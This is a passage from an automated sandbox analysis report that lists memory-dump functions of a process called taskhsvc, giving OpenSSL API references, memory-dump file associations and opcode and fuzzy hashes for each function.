                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_txt2objX509at_add1_attr_by_txt
                                                            • String ID:
                                                            • API String ID: 734047113-0
                                                            • Opcode ID: 90dd150f5680bd137720f4189ce6aeaf8c3bae195ab99bcdeca3e873bdd0551d
                                                            • Instruction ID: 8201ef9d9727e5ec69a2701f4c711396d0e5bc900385cb00325ead1061d536f9
                                                            • Opcode Fuzzy Hash: 90dd150f5680bd137720f4189ce6aeaf8c3bae195ab99bcdeca3e873bdd0551d
                                                            • Instruction Fuzzy Hash: 2621C235608A409FD700DF39C28090AB7F1BB8A318F169A5CEAA8DB314D731E9018F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE84F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocR_put_error
                                                            • String ID: l
                                                            • API String ID: 2513334388-2517025534
                                                            • Opcode ID: d39438d9442fb2f6482878d150e0b05ec587104b2088593e69ae260ba84c62c3
                                                            • Instruction ID: 87edef2fa65b7bb7b2fc9b332727e0c7c9334a72d56081ba1cdb91d2eaa75075
                                                            • Opcode Fuzzy Hash: d39438d9442fb2f6482878d150e0b05ec587104b2088593e69ae260ba84c62c3
                                                            • Instruction Fuzzy Hash: 3D31257150A3118FE700CF1AD450A0BBBF4BF89358F66891EE99A5B750D771E901CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6EE20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocstrlen
                                                            • String ID: J
                                                            • API String ID: 3192733237-1141589763
                                                            • Opcode ID: 36c7091269e7bd211632e848efbbb04ea661621e1eeb234bde3d4dfe3de4dfc7
                                                            • Instruction ID: ea8c62ab8beee4c7309e7136efbd4420b229fc6eb188591b6d9538c9faa681c7
                                                            • Opcode Fuzzy Hash: 36c7091269e7bd211632e848efbbb04ea661621e1eeb234bde3d4dfe3de4dfc7
                                                            • Instruction Fuzzy Hash: B921AE361087518FDB20CF25C84078BFBF1AF95308F1B8A5DE9941BB51D771A40A8BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC4890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 806ca5225d656905d6c31995d9184fb057c113920cc83fb9ab55443a5f85d821
                                                            • Instruction ID: 837149705f22b1f95ee48f64bb9a8ac8738a2077c2e1f7506326a787068ff550
                                                            • Opcode Fuzzy Hash: 806ca5225d656905d6c31995d9184fb057c113920cc83fb9ab55443a5f85d821
                                                            • Instruction Fuzzy Hash: EC01F6706093428FEB00DF25C68065ABBF4AF45358F219A1DE9A88B740E774D505CF16
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE22EB0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10380ce1630f44c0ec69e6fdbb994c0c2710b4215f38910eacefce21663762a9
                                                            • Instruction ID: 383b73cac1a3e9ebc671fe1c243009cbe7326cec3b24abccd39aff8595c86593
                                                            • Opcode Fuzzy Hash: 10380ce1630f44c0ec69e6fdbb994c0c2710b4215f38910eacefce21663762a9
                                                            • Instruction Fuzzy Hash: FA413E356257018FEB14DF19C185A1BB7F5BB9932CF21891CEA6467B44C734E900CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE5EEF0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CRYPTO_cfb128_encrypt.LIBEAY32 ref: 6CE5EF3D
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CE5EF52
                                                            • CRYPTO_ofb128_encrypt.LIBEAY32 ref: 6CE5EFA5
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_cfb128_encryptO_ofb128_encrypt__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 905777043-0
                                                            • Opcode ID: f246c086dc0e64b57a47ce27523923b355433eb11e8885661d6994499da25daa
                                                            • Instruction ID: ee56161fc387b1323e8ab8036dbb8be46b18a292e44053a01a62d8f3ed59f30b
                                                            • Opcode Fuzzy Hash: f246c086dc0e64b57a47ce27523923b355433eb11e8885661d6994499da25daa
                                                            • Instruction Fuzzy Hash: 4D213D749187418FC740DF29C28160ABBF0BB99308F518D2DF998C7710E376EA588F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF04E10 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i
                                                            • String ID:
                                                            • API String ID: 785741724-0
                                                            • Opcode ID: b2df53d436c1971fe7fdf370d9a6b41973a0e8dd33a98e84b84c4fc30a6a5a38
                                                            • Instruction ID: 83526cd8d317b27090e034d875aff470f1eff4bab228cae585ab3d4e1903ea55
                                                            • Opcode Fuzzy Hash: b2df53d436c1971fe7fdf370d9a6b41973a0e8dd33a98e84b84c4fc30a6a5a38
                                                            • Instruction Fuzzy Hash: B12114B56093019FC700DF29C49464BBBF0FF99798F91882CE9888B710E3B5D844DB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED2FB0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_free
                                                            • String ID:
                                                            • API String ID: 2640950527-0
                                                            • Opcode ID: 99b0309a83b2e255870344a026365ac30ba051ce26fab82ceb0aa43680a393eb
                                                            • Instruction ID: 773d99818cf9e77fa33967e4dd1336a046501030780df418d10418939efa59e5
                                                            • Opcode Fuzzy Hash: 99b0309a83b2e255870344a026365ac30ba051ce26fab82ceb0aa43680a393eb
                                                            • Instruction Fuzzy Hash: 6611D3B0219601CFEB00DF29C594706BBF4AB45348F26C868D9888F755D3BAD8498FA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6AFF0 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF6B014
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6B027
                                                            • PKCS12_item_decrypt_d2i.LIBEAY32 ref: 6CF6B050
                                                              • Part of subcall function 6CF6CAA0: EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF6CAFE
                                                              • Part of subcall function 6CF6CAA0: EVP_PBE_CipherInit.LIBEAY32 ref: 6CF6CB27
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
